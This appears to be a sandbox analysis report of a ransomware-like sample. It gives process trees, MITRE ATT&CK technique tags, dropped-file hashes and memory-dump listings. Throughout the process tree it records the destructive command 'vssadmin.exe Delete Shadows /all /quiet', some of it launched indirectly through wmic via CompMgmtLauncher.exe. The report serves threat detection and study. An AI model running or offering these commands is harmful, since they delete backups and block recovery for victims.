C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:540

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2132
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1872

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1704

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1872

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1660
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2504

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1476

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2216

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1372
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2200
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2700

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2764

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:228

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1684
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1612
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3020

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
27ff3f1f0d6a8b38e8173e6d0083b09a

SHA1
6ea8652ce4c41d14dc323d910c67692d5f3d0ab3

SHA256
0003c54b8abed07272ca799d92f1d691ebc0400aecbbece2ec3e1b416d719d54

SHA512
286be4a0bff61c597a3ffaf56444fed19fd08eb3f99a11ba50986e9ea7d1add125111b17b330d1416379e974f34f3d470f1893dc741a275bcbdda6a62ac75d3b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b50e8bfed9de97372b5af1479bedb8b1

SHA1
4df6c567010c3bdf8c546b6a1460b677e0410b80

SHA256
a17b155c65bc696b55903aa1071cb32ba4294849ac4e9bc01fee3c4719098684

SHA512
fc69c5bf71a1998218471a77a0d95d5be02ec1d0134ab7eec3eada77ec781277da4c77bcd07635f6e8b69a22a0a6baa9e8aaf2600358d71a92e3b31aec53757c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1975e4a084cadfc2b4297da65b7de1a0

SHA1
8548d70f9712ea8eefba7af32c014ad3ea078797

SHA256
c03930fc45fb4e118d9196acfe7b26bd6722f81ffb627f710d342e300ed0b3dd

SHA512
e4de896d3a44ca40c24fed8ac4a9f026e7f6dfee4f555e4e5a180b09d59740579c357828492d386bbcec4825b3780dcb95fe7607014bc9f94354c8f06b6a5e84

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c31cd526472c4363246aea1b6e52cc39

SHA1
61c24acf0b6caa8e5375420f31baccd99b1b0456

SHA256
404e928088f886c79abacdeea0f59b24981b1925e1e0eebe7a70ff442fa1b889

SHA512
82d07f53dea27f9e829656d6cac3cc12d3bdb5b90ef15335612a31660b7c26b1ab390837a577253da92bbff7c9f4c2bff031ca6e2893d8c5118286f47c87777b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d35259554142cc895be443deea951a9c

SHA1
6ca96b0389e1791eb8933313888bafd2193371c4

SHA256
2495aa77805f4bdc66bce19af53efeec5be0227e442b68aea37824593ccb8d72

SHA512
5108f96da6972ede55905c5a3351eb9536317eb12af30755ef0aa2bfab6d592947d0a452530bc3de43b87f4de4360302957dbb6a50e16a3cfcbecd93ebb246ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e7d4c16b81da2e777394722ba0f9bbdc

SHA1
2d4c407febfd7fb2b96a6c6e21062b8886b1a379

SHA256
d7271848e914171dd033034a0ad025f4c8e0f82a3ef17e5608a5b831ff209cd1

SHA512
9720419ebd3c7113cd9aa430daade2000f97772e6aa9346ae3feae860b2033caffd3e6740411248680c249519c84135fab5ed40a844d511a1395eb2ef34f41be

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
24b03167315b8f3bee88749581b33a4c

SHA1
a11190b6e4455cedab10cfee88115ad6531d0c57

SHA256
9120fda432beda0fd91b1f1171d7b952fa29ce633b03e95848eb5f90a02a42b3

SHA512
a673c4840388b9b31da41f291ff39be766155e2d080aa6f28aa21dd20f849b739577a5b09cf197a39c0a51c170043892b1a7fef522d48f56e93db8424e4146ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
de65a9963300054ecd5ea99d36c89b8f

SHA1
2d81516f5345d9359c476ea5efee3574d1bbb5a7

SHA256
797c426a87fa5ddeb251eaf9fd712df53b43391aa9dae27b426650b254e14f97

SHA512
9d53156421472085e652d4157bd1afb6916fd20354e86b5da1364499366943a46eed114ab8a0ac895b7815b6893a60760b76112b8696f51fcc36a1cadc83ee06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c57eb90b39652058aadd15d92b8765bf

SHA1
2ac7cf812f94183c67727d9ac2084c52e7b4ef18

SHA256
a46b6b7430a65de53361ae98455f80ae7320f2ceab38639e6a8e6c883efca600

SHA512
ad456aca2fbc5cf73add6d1227320d4fd96f994defa4023decb21a9ceab3a998824bc617a367a00d9366acfa23377e897f025cd890908f5e13cbe146de99ae15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aa0e71944fa86bd96e73c0b91f29aba0

SHA1
a4a398d78e4b65f23ca2beb05ef477d3d556eeb1

SHA256
c8a9e2d40f4a8b138f76f817e11ee82f8fb0f9b4d4c9e8989cdbe788104155be

SHA512
c702010e1955d4c7216934f6f3f104ba46ea3d99c0456ae9849e8355ea95bf7f3ead5077e6653b5bd85c004156cc9c780203c902f2d16b7d8afe80ccb35847b3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
73f6cd476df3bd650a22b2c0dd650bfd

SHA1
7fd3f424bdcefa362765cccb6d3ad1dd27abc1d9

SHA256
f5e50ab621cc4832a8f21940b3fa8c3c840dcc84b220be82818f442a8685bf7a

SHA512
3ea0e23e0a5926f24a32e3b919f80a76a28258c5daeb132f6e6f630dcb02ef90bda0c00cc10a0c05eb0217d4b6a11a27827d5c8fbb9f1adb0e57ed55875c47ac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1904e847e1c37ef4e5c777e146294a96

SHA1
3025c2c7a81d171153283cfe1aa21105b919dc23

SHA256
f50942414a06cc4099e00b1689d09582b52c6af32c48dd24e49d5fca894358e3

SHA512
dcb576da981d0385f86ea7058de588d78aeaf7e8fb88cb5a3b1c2124cb0b80768fcd6200b688a5df77b6374890b84b499b35bed866cd49cd8754855b6224ebf8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b84931ccd2c636d209f0f31a45920117

SHA1
c837b1ee932f3ed367769af0269aa644fccc76b7

SHA256
907c13cde7f2b21f89b85a26f9939fad99c65ce3d3621863f825a8ac0c9df625

SHA512
cd81a936a50637ef1a91abc3135c4dcf7bd0f72e3324dd071aa117970de270e8ffe3fa78defdd0ba8449fd3c4b265a209d0c34f25eb35d90ec5a87dbb78c2b58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4c27a05ccb6112115f6aad6ee64ef7c0

SHA1
6eab9b1b8b700ac9e2d084c345c67165fe5e1c3a

SHA256
734772e53dbd92951ab1cc444448e9ec28935194a7831b894fd9c04385b7103f

SHA512
be504bac9b8d06c97c1fb80a0a476fe18f3f6824d97906dcc6eb74f938376d46b9c7ff26e88308804d940ee8aca882f2e2f69e14dd94a02bf821ecc953126760

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1D25.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1E03.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
9d4de1b8ffcb1f89c7352821d0dd53f0

SHA1
98447a1b34b9aac7544613a2184a16188d6db7a2

SHA256
c9374a0c1df5c2f8f16a7a53afc2063692ba548bde07417858b27bf743437674

SHA512
102aaf1f7e4bf31cdba1882467a57cac080a31a0f76725b38d646918070a59d5c3f72105d4648acde8f31e9b7d7d96fb94a8313840a4674aee4b2a2f9662a56c

Download Submit
memory/1116-0-0x0000000000570000-0x0000000000575000-memory.dmp

Filesize
20KB

Download
memory/2116-8-0x0000000001D20000-0x0000000001D21000-memory.dmp

Filesize
4KB

Download
memory/2116-5-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2116-6-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/2116-7-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download
memory/2116-4-0x0000000001DD0000-0x0000000002402000-memory.dmp

Filesize
6.2MB

Download
memory/2116-9-0x0000000001D30000-0x0000000001D31000-memory.dmp

Filesize
4KB

Download
memory/2116-10-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/2116-11-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/2116-12-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/2116-13-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/2116-14-0x0000000002480000-0x0000000002481000-memory.dmp

Filesize
4KB

Download
memory/2116-15-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download